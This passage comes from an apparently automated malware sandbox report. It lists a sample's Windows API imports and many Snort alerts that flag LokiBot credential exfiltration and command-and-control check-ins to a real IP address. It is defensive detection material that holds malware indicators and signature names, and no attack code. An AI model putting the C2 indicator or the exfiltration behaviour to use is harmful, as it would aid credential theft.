                    KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation system | Country where language is spoken
                    English | United States

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    01/14/22-07:15:14.068204 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49765 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:14.068204 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:14.068204 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:14.068204 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49765 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:15.774786 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49766 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:15.774786 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:15.774786 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:15.774786 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49766 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:17.010470 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49767 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:17.010470 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49767 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:17.010470 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49767 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:17.010470 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49767 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:18.393621 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49768 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:18.393621 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49768 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:18.393621 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49768 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:18.393621 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49768 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:19.695573 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49769 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:19.695573 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:19.695573 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:19.695573 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49769 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:21.323362 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:21.323362 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:21.323362 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:21.323362 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49770 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:24.359164 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:24.359164 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:24.359164 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:24.359164 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49771 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:25.808698 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49772 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:25.808698 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49772 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:25.808698 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49772 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:25.808698 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49772 | 80 | 192.168.2.4 | 104.223.93.105
                    01/14/22-07:15:27.597120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.4104.223.93.105
